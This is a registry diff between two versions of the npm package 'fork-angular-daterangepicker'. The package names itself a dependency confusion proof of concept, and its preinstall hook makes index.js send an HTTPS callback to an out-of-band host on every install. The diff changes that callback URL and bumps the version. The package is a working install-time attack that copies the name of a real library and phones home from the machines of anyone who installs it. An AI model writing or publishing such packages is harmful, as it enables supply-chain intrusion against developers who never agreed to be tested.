fork-angular-daterangepicker 10.0.0 → 11.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +2 -2
package/index.js CHANGED
@@ -1,6 +1,6 @@
1
1
  const https = require("https");
2
2
 
3
- const callback = "https://ujqbq3da.pingback.sh/npm-installed";
3
+ const callback = "https://d8s1eti9io6kqja3sg5gsyqs4aqawhqxg.oast.live/npm-installed";
4
4
 
5
5
  https.get(callback, (res) => {
6
6
  console.log("PoC callback sent");
package/package.json CHANGED
@@ -1,11 +1,11 @@
1
1
  {
2
2
  "name": "fork-angular-daterangepicker",
3
- "version": "10.0.0",
3
+ "version": "11.0.0",
4
4
  "description": "PoC package for dependency confusion testing",
5
5
  "scripts": {
6
6
  "preinstall": "node index.js"
7
7
  },
8
8
  "dependencies": {
9
- "fork-angular-daterangepicker": "^9.0.0"
9
+ "fork-angular-daterangepicker": "^11.0.0"
10
10
  }
11
11
  }